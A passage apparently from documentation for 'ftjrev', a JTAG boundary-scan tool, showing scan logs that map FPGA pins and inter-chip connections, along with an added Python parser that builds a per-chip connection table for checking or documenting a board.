CLOCK: 1[XC3S1200E-FT256]:IPAD78
CLOCK: 1[XC3S1200E-FT256]:K2
CLOCK: 1[XC3S1200E-FT256]:IPAD258
CLOCK: 1[XC3S1200E-FT256]:L8
CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13
CLOCK: 2[XC5VLX330-FFG1760]:IO_J30
CLOCK: 2[XC5VLX330-FFG1760]:IO_P37
Pin pass...
0[XC5VLX330-FFG1760]:IO_BB13 --> 2[XC5VLX330-FFG1760]:IO_AT16
0[XC5VLX330-FFG1760]:IO_AY12 --> 2[XC5VLX330-FFG1760]:IO_AW17
0[XC5VLX330-FFG1760]:IO_AY13 --> 2[XC5VLX330-FFG1760]:IO_AT20
0[XC5VLX330-FFG1760]:IO_BA11 --> 2[XC5VLX330-FFG1760]:IO_AT19
0[XC5VLX330-FFG1760]:IO_BB11 --> 2[XC5VLX330-FFG1760]:IO_AT17
0[XC5VLX330-FFG1760]:IO_BB12 --> 2[XC5VLX330-FFG1760]:IO_AU16
0[XC5VLX330-FFG1760]:IO_AW12 --> 2[XC5VLX330-FFG1760]:IO_AW18
0[XC5VLX330-FFG1760]:IO_AW11 --> 2[XC5VLX330-FFG1760]:IO_AV35
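The scan output above is a flat text listing, but what it describes is a netlist: which chips are on the chain, which pins toggle like clocks, and which pin of one FPGA is wired to which pin of another. The parser below is an added example written for these notes (it is not part of ftjrev) that turns that listing into a structure a board survey can query; the sample text is constructed from the lines shown above.

```python
"""Parse the text ftjrev prints during a scan into a small netlist model:
devices on the chain, pins that toggle like clocks, and the pin-to-pin
connections found by the pin pass.  Added example for these notes, not part
of ftjrev; the sample below is constructed from the output shown above."""

import re
from collections import defaultdict

DEVICE_RE = re.compile(r"^Device (\d+): IDCODE ([0-9A-Fa-f]{8}) \((\S+)\)$")
CLOCK_RE = re.compile(r"^CLOCK: (\d+)\[([^\]]+)\]:(\S+)$")
NET_RE = re.compile(r"^(\d+)\[([^\]]+)\]:(\S+) --> (\d+)\[([^\]]+)\]:(\S+)$")
CHAIN_RE = re.compile(r"^Total boundary scan chain: (\d+)$")

# Constructed sample in the shape of the 'ftjrev scan' output above.
SAMPLE_SCAN = """\
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14
CLOCK: 1[XC3S1200E-FT256]:K2
Pin pass...
0[XC5VLX330-FFG1760]:IO_BB13 --> 2[XC5VLX330-FFG1760]:IO_AT16
0[XC5VLX330-FFG1760]:IO_AY12 --> 2[XC5VLX330-FFG1760]:IO_AW17
"""


def parse_ftjrev(text: str) -> dict:
    """Return devices, clocks, nets and the chain length found in ftjrev output.

    devices:    {index: (idcode, package_name)}
    clocks:     [(device_index, pin)]
    nets:       [((src_device, src_pin), (dst_device, dst_pin))]
    chain_bits: length of the boundary scan register, or None if not printed
    """
    result = {"devices": {}, "clocks": [], "nets": [], "chain_bits": None}
    for raw in text.splitlines():
        line = raw.strip()
        if m := DEVICE_RE.match(line):
            result["devices"][int(m[1])] = (int(m[2], 16), m[3])
        elif m := CLOCK_RE.match(line):
            result["clocks"].append((int(m[1]), m[3]))
        elif m := NET_RE.match(line):
            result["nets"].append(((int(m[1]), m[3]), (int(m[4]), m[6])))
        elif m := CHAIN_RE.match(line):
            result["chain_bits"] = int(m[1])
    return result


def connections_by_device(parsed: dict) -> dict:
    """Group the pin pass into {device_index: {pin: (peer_device, peer_pin)}}
    so every probed pin of one chip can be looked up directly."""
    table = defaultdict(dict)
    for (sd, sp), (dd, dp) in parsed["nets"]:
        table[sd][sp] = (dd, dp)
    return dict(table)


if __name__ == "__main__":
    parsed = parse_ftjrev(SAMPLE_SCAN)
    for idx, (idcode, name) in sorted(parsed["devices"].items()):
        print(f"device {idx}: {name} idcode 0x{idcode:08x}")
    for dev, pins in connections_by_device(parsed).items():
        for pin, peer in pins.items():
            print(f"{dev}:{pin} -> {peer[0]}:{peer[1]}")
```

Feeding the full output of a long pin pass through this gives a per-chip connection table, which is the form in which the probe results are actually useful when checking a board against its schematic or documenting an undocumented one.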
Scanning for Input Pins:
$ ./ftjrev iprobe
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14
CLOCK: 0[XC5VLX330-FFG1760]:IO_J13
CLOCK: 0[XC5VLX330-FFG1760]:IO_K13
CLOCK: 1[XC3S1200E-FT256]:IPAD78
CLOCK: 1[XC3S1200E-FT256]:K2
CLOCK: 1[XC3S1200E-FT256]:IPAD258
CLOCK: 1[XC3S1200E-FT256]:L8
CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13
CLOCK: 2[XC5VLX330-FFG1760]:IO_J30
CLOCK: 2[XC5VLX330-FFG1760]:IO_P37
Probing inputs, press ctrl+c to stop...
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
Scanning for Output Pins:
$ stty -F /dev/ttyUSB2 speed 115200
$ ./ftjrev oprobe > /dev/ttyUSB2
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
Probing outputs, press ctrl+c to stop...
halt
resume
step